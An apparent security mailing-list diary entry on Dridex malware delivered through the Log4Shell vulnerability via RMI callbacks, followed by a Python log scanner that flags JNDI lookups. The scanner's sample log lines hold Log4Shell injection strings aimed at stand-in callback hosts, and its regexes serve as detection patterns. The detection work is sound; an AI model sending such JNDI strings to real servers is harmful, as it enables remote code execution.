[MART] - Daily Diary #415 - Dridex Malware Delivered Via Log4Shell

CTAS-MAT ctas-mat at appgate.com
Mon Dec 20 21:35:32 UTC 2021


I hope everyone is doing well!

Below is the entry for today.

12/20/2021 - Diary entry #415:

As mentioned in our Daily Diaries #114 and #116, Dridex is a major banking trojan that appeared around 2011 and has evolved continually ever since. The APT (Advanced Persistent Threat) group behind this malware is known as TA5051, the same developers behind TrickBot and Locky ransomware.

Recently, threat actors started to exploit Log4Shell, a critical Apache Log4j vulnerability, to deliver Dridex to vulnerable systems. They are using an exploit variation that relies on RMI (Remote Method Invocation) instead of LDAP (Lightweight Directory Access Protocol) callback URLs to execute their Java class payloads.

Once executed on Windows, the payload downloads an HTA file that executes a VBS script responsible for installing and launching Dridex using RegSvr32.exe, a native Windows binary. On Linux devices, it executes a Python script to install Meterpreter, which invokes a remote shell used to deploy other payloads.

Besides its trojan capabilities, Dridex is also known for deploying other threats, such as different ransomware strains. Dridex has therefore been used as Malware-as-a-Service, owing to its capacity for spreading and its threat actors' efforts to take advantage of vectors with large attack surfaces, like Log4Shell.

Kind Regards,



Felipe Tarijon de Almeida
Malware Analyst

E: felipe.tarijon at appgate.com
C: +55 11 97467 9549
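
The diary entry above notes that this campaign uses RMI rather than LDAP callback URLs. The following is an added example, not part of the original message or any Appgate tooling: a small log scanner that flags JNDI lookups of any scheme and records whether a rule written only for the LDAP form would have caught each one. The log lines, IP addresses and `example.invalid` hosts are constructed for illustration.

```python
import re
from urllib.parse import unquote

# JNDI lookup with any scheme, e.g. ${jndi:rmi://host:port/name}
JNDI_RE = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<target>[^/}\s]+)", re.IGNORECASE)
# A narrow rule that only looks for the LDAP form of the callback
LDAP_ONLY_RE = re.compile(r"\$\{jndi:ldap://", re.IGNORECASE)

# Constructed sample access-log lines (documentation IP ranges, .invalid hosts)
SAMPLE_LOG = [
    '198.51.100.7 - - [20/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 '
    '"-" "${jndi:ldap://cb.example.invalid:1389/a}"',
    '198.51.100.9 - - [20/Dec/2021:10:03:44 +0000] "GET /?q=%24%7Bjndi%3Armi'
    '%3A%2F%2Fcb.example.invalid%3A1099%2Fobj%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '203.0.113.5 - - [20/Dec/2021:10:05:10 +0000] "GET /index.html HTTP/1.1" '
    '200 2048 "-" "Mozilla/5.0"',
]

def find_jndi_lookups(line):
    """Return (scheme, callback target) for each JNDI lookup in a log line."""
    decoded = unquote(line)  # query strings are logged percent-encoded
    return [(m.group("scheme").lower(), m.group("target"))
            for m in JNDI_RE.finditer(decoded)]

def scan(lines):
    """Return one finding per lookup, noting if an LDAP-only rule sees it."""
    findings = []
    for number, line in enumerate(lines, start=1):
        ldap_rule_hit = bool(LDAP_ONLY_RE.search(unquote(line)))
        for scheme, target in find_jndi_lookups(line):
            findings.append({
                "line": number,
                "source_ip": line.split(" ", 1)[0],
                "scheme": scheme,
                "callback": target,
                "caught_by_ldap_only_rule": ldap_rule_hit,
            })
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The callback host and port extracted per finding can be fed into egress-filter or DNS-log reviews to check whether the server actually reached out.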
